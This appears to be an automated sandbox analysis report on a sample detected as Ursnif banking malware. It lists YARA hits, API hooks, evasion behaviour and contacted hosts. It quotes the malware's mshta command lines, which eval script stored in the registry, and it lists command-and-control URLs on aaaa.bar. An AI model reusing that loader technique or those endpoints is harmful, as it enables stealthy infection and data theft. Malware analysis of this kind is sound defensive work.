Source: Yara match File source: 00000004.00000003.739495874.00000000058CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668637384.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.669217152.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.739276832.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668670422.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.719599695.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 2908, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 1368, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4892, type: MEMORYSTR
Source: Yara match File source: 6.2.rundll32.exe.2a90000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.f30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.37194a0.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.37194a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.10d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.509157681.0000000002A90000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.796706497.0000000000F30000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.563086752.00000000030D0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.804704031.0000000003719000.00000004.00000040.sdmp, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFA9B33521C
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFA9B335200
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\loaddll32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4904 Thread sleep count: 167 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4904 Thread sleep time: -37408s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4904 Thread sleep count: 69 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4876 Thread sleep time: -1773297476s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4876 Thread sleep count: 79 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4876 Thread sleep count: 49 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4876 Thread sleep count: 35 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4876 Thread sleep count: 89 > 30
Source: C:\Windows\System32\loaddll32.exe Process information queried: ProcessInformation Jump to behavior
Source: loaddll32.exe, 00000000.00000002.800825641.000000000122E000.00000004.00000020.sdmp, regsvr32.exe, 00000003.00000003.751002703.000000000330F000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW

Anti Debugging:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10001753 LoadLibraryA,GetProcAddress, 0_2_10001753
Contains functionality to read the PEB
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F008B1 mov eax, dword ptr fs:[00000030h] 0_2_00F008B1
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F00576 mov eax, dword ptr fs:[00000030h] 0_2_00F00576
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F0099D mov eax, dword ptr fs:[00000030h] 0_2_00F0099D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F007C8 mov eax, dword ptr fs:[00000030h] 0_2_00F007C8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F0090C mov eax, dword ptr fs:[00000030h] 0_2_00F0090C

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: aaaa.bar
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 31.220.111.98 187
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Kf7p='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Kf7p).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Acbs='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Acbs).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Ns0e='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ns0e).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>'
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\gECym.dll',#1
Source: loaddll32.exe, 00000000.00000002.802991988.00000000018A0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.802991988.00000000018A0000.00000002.00020000.sdmp Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.802991988.00000000018A0000.00000002.00020000.sdmp Binary or memory string: SProgram Managerl
Source: loaddll32.exe, 00000000.00000002.802991988.00000000018A0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd,
Source: loaddll32.exe, 00000000.00000002.802991988.00000000018A0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10001E13 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 0_2_10001E13
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10001EE5 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 0_2_10001EE5

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000009.00000003.668818796.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.669066527.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.760454651.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.720146282.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.725551694.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.669002058.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668792468.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696203622.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.668767287.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696328482.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682552775.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.729873849.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.751457455.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682707764.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682497297.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668983889.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682925882.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668839332.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.728388991.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682449280.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.729934950.0000000004EDC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.669342603.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.726873336.0000000003A3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668597805.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696428988.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696293646.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.737533634.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668893514.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668698618.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.762064879.000000000532C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696353839.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696234648.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696265985.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696490210.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.761914135.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682640820.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682808858.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.683000420.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.668889642.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.731054718.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.669161190.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.739495874.00000000058CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668637384.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.669217152.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.739276832.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668670422.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.719599695.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 2908, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 1368, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4892, type: MEMORYSTR
Source: Yara match File source: 6.2.rundll32.exe.2a90000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.f30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.37194a0.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.37194a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.10d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.509157681.0000000002A90000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.796706497.0000000000F30000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.563086752.00000000030D0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.804704031.0000000003719000.00000004.00000040.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000009.00000003.668818796.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.669066527.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.760454651.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.720146282.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.725551694.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.669002058.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668792468.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696203622.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.668767287.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696328482.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682552775.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.729873849.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.751457455.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682707764.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682497297.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668983889.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682925882.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668839332.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.728388991.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682449280.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.729934950.0000000004EDC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.669342603.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.726873336.0000000003A3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668597805.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696428988.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696293646.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.737533634.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668893514.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668698618.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.762064879.000000000532C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696353839.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696234648.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696265985.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696490210.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.761914135.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682640820.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682808858.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.683000420.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.668889642.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.731054718.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.669161190.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.739495874.00000000058CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668637384.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.669217152.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.739276832.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668670422.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.719599695.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 2908, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 1368, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4892, type: MEMORYSTR
Source: Yara match File source: 6.2.rundll32.exe.2a90000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.f30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.37194a0.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.37194a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.10d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.509157681.0000000002A90000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.796706497.0000000000F30000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.563086752.00000000030D0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.804704031.0000000003719000.00000004.00000040.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 506330 Sample: gECym.bin Startdate: 20/10/2021 Architecture: WINDOWS Score: 100 26 dart.l.doubleclick.net 172.217.168.38, 443, 49824, 49825 GOOGLEUS United States 2->26 28 tls13.taboola.map.fastly.net 151.101.1.44, 443, 49832, 49833 FASTLYUS United States 2->28 30 16 other IPs or domains 2->30 40 Multi AV Scanner detection for submitted file 2->40 42 Sigma detected: Powershell run code from registry 2->42 44 Yara detected  Ursnif 2->44 46 8 other signatures 2->46 8 loaddll32.exe 7 2->8         started        signatures3 process4 dnsIp5 34 aaaa.bar 31.220.111.98, 443, 49952, 49954 AS-HOSTINGERLT Lithuania 8->34 52 Writes or reads registry keys via WMI 8->52 54 Writes registry values via WMI 8->54 12 regsvr32.exe 8->12         started        16 cmd.exe 8->16         started        18 iexplore.exe 8->18         started        20 rundll32.exe 8->20         started        signatures6 process7 dnsIp8 36 aaaa.bar 12->36 56 System process connects to network (likely due to code injection or exploit) 12->56 58 Writes or reads registry keys via WMI 12->58 60 Writes registry values via WMI 12->60 22 rundll32.exe 16->22         started        38 192.168.2.1 unknown unknown 18->38 signatures9 process10 dnsIp11 32 aaaa.bar 22->32 48 System process connects to network (likely due to code injection or exploit) 22->48 50 Writes registry values via WMI 22->50 signatures12
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.26.3.70
 ad-delivery.net United States
13335 CLOUDFLARENETUS false
31.220.111.98
 aaaa.bar Lithuania
47583 AS-HOSTINGERLT false
151.101.1.44
 tls13.taboola.map.fastly.net United States
54113 FASTLYUS false
104.26.7.139
 btloader.com United States
13335 CLOUDFLARENETUS false
104.20.184.68
 geolocation.onetrust.com United States
13335 CLOUDFLARENETUS false
172.217.168.38
 dart.l.doubleclick.net United States
15169 GOOGLEUS false

Private
IP
192.168.2.1

Contacted Domains

Name IP Active
contextual.media.net 23.211.6.95 true
dart.l.doubleclick.net 172.217.168.38 true
tls13.taboola.map.fastly.net 151.101.1.44 true
aaaa.bar 31.220.111.98 true
myip.opendns.com 102.129.143.33 true
hblg.media.net 23.211.6.95 true
lg3.media.net 23.211.6.95 true
resolver1.opendns.com 208.67.222.222 true
btloader.com 104.26.7.139 true
geolocation.onetrust.com 104.20.184.68 true
ad-delivery.net 104.26.3.70 true
www.msn.com unknown unknown
ad.doubleclick.net unknown unknown
srtb.msn.com unknown unknown
img.img-taboola.com unknown unknown
web.vortex.data.msn.com unknown unknown
222.222.67.208.in-addr.arpa unknown unknown
cvision.media.net unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://ad.doubleclick.net/favicon.ico?ad=300x250&ad_box_=1&adnet=1&showad=1&size=250x250 false
    		high
    https://aaaa.bar/jdraw/5EykzOMH8AC5xhH2f/h8YTRIF2mRSj/KI86vZ_2Fir/d_2FuekCCAOUjf/zFWcX3e13Ac_2BX_2BJGA/HUhc5yQiyPXedVM9/FyaB9AafT7f6pn1/rx17UyN0GmK2igoXTb/2p_2Bsvx3/fo8we1bgw6ZsfyAC6K72/DEX9YIVMXwvcSkZsNZR/8w9U8utAyGo407eExfiyfi/bLDkUZuz9hmdJ/XGInYyFxli4cy/JoKC.crw true
    • Avira URL Cloud: safe
    		 unknown
    https://aaaa.bar/jdraw/yQNRXOou_2F/TKb_2FDPLUxEHX/34UsINmRGrF0U0brjExsG/R8lvAy6e3bs7Nh2H/QoLe_2Bwp2v2e8Z/IwuiqSnSaPWQnudhme/0fUiRiwnK/HC2m5rShJXeZnaMhBAa7/2sv1pUExc23tcG4uzbe/S9YqUCaVHHJSHD_2FHBasu/DOlWi2P1fW4xM/vPgP1tY3/PB1yvdHjP2kNFl0vG_2Fhxc/khv1QiPG/3tnR7uH.crw true
    • Avira URL Cloud: safe
    		 unknown
    https://aaaa.bar/jdraw/v6MBuMp_2/FbQ1ciPPyCG2FcgWXCEw/4p6JWEqOHqaqqmtUZlW/iZ4hp74waYQa3SoGGuOho1/ovuxQrp7KsWgS/wBggvPBS/iWInt5CFnJyvSqpyHgJyYxn/O_2F_2BUYe/fLDTk5RpDf_2F9mZ_/2F7NAIxeGgZa/QcsaY21TZZx/U7QIv9qlBRWqpg/DR61HU_2FzqgxKP2wonEs/EkSZK.crw true
    • Avira URL Cloud: safe
    		 unknown
    https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_pad%2Cb_auto/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Faedbb0638c2ccabdeb958fc2d93204dc.jpg false
    • Avira URL Cloud: safe
    		 unknown
    https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5b179a030c29a1ac065fdc22323514dd.png false
    • Avira URL Cloud: safe
    		 unknown
    https://aaaa.bar/jdraw/NO7gR0KTty/Oqx9aKgxsT2Y54eU9/T_2Fq68MoL8B/sVtG7ExwGuN/2b4WQXmrNjZqxz/IsPGuUpM_2FQweZHv_2BB/qSCYCr2zsOkbh38r/It4yIHc8jFLoOJQ/k2WdhsET8UEtCwKWoz/qKONYcQpl/QBJ1lUtsdnk2R51rdvsn/Du_2F_2Ftub4vOTuIOX/47sdvY8Q/mQd32Pz7EA_2F/N.crw true
    • Avira URL Cloud: safe
    		 unknown
    https://aaaa.bar/jdraw/MVdZIiu0NzX64W/jGgxHg6bC6YiiTOGCL_2B/K5_2B4OguOIrq_2F/deq5LFM1_2Fh_2B/A30hkj4LBKS8PnjdwI/9w5zD21KD/Gv4zCmpHpXW8kBPJ6yzJ/GKf4n1QcwBRAhkvF2a_/2BDpnBrAV7AZvGg_2FwtGG/RaDUbMye7jqhn/NmN4Vf9F/bD7myyGQXfiKlv1_2BoXKI7/VLTDzeWG/dZ.crw true
    • Avira URL Cloud: safe
    		 unknown
    https://aaaa.bar/jdraw/H4GjPkmE7AedOn2/SaetnicpaebgBYZBph/BvmQBH2Ya/Oa7o5fA_2FxihzNsKVGG/_2BKOERN0ze3StZ8PJO/K9jrlAYK2cirYDQTLgJFGo/m_2BMIG_2Ff7J/M2tNW_2B/JwKxyFyNvYCJPpLYcu2z3fg/Co6_2F9DSd/aeV2iIileaWP_2B3q/B8Ii95Syxk_2/BFqOHwCSf6U/KnFKNxJjQfI9vK/6tnrhCZ8FpH5l_2FDWF/lT.crw true
    • Avira URL Cloud: safe
    		 unknown
    https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location false
      		high
      https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5282696e9e2aabcd3d346a6d7ed7591e.png false
      • Avira URL Cloud: safe
      		 unknown
      https://ad-delivery.net/px.gif?ch=1&e=0.9973131461099627 false
      • Avira URL Cloud: safe
      		 unknown
      https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F18faa6af75b04f0199f63404d815074b.jpg false
      • Avira URL Cloud: safe
      		 unknown
      https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F0d7ca0c89d5d09bf1d71170b01c3a769.jpg false
      • Avira URL Cloud: safe
      		 unknown
